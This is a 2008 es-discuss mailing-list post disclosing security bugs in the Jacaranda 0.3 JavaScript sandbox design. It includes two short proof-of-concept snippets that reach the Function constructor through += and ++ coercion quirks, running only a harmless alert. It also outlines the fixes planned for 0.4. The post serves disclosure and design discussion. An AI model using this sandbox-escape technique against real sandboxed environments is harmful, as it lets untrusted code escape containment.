Security bugs in Jacaranda 0.3

David-Sarah Hopwood david.hopwood at industrial-designers.co.uk
Thu Nov 13 20:19:48 PST 2008


Jacaranda 0.3 incorrectly assumes that a += operator returns a number,
when in fact it can return a number or string. Also, the ++ and --
operators are incorrectly implemented on Internet Explorer, and may
not return a number.

This allows the following exploits (in theory, since Jacaranda 0.3
has not been implemented):

  // All ES3 implementations
  (function() {
    var c = 'constructor';
    var F = (function(){})[c += ''];  // Function constructor
    F('alert("toast");')();
  )();

  // Internet Explorer / JScript only
  (function() {
    c = 'constructor';
    var F = (function(){})[c++];      // Function constructor
    F('alert("toast");')();
  })();

In Jacaranda 0.4,
 - '+=' expressions will be treated only as 1st-class, not exposed.
   (The right-hand-side of the += is not restricted.)
 - postincrement/postdecrement will not be treated as exposed, except
   in modules that are marked as depending on ES3.1.


Does anyone know of any remaining cases where:

 - unary operators +, -, ~
 - prefix operators ++ and --
 - postfix operators ++ and --
 - binary operators *, /, %, -, <<, >>, >>>, &, ^, |
 - assignment operators *=, /=, %=, -=, <<=, >>=, >>>=, &=, ^=, |=

do not return a number value (or a decimal value in the case of
ES3.1), either in correctly implemented ES3 / ES3.1 Kona draft, or
due to a bug in any common JavaScript implementation?

-- 
David-Sarah Hopwood



More information about the Es-discuss mailing list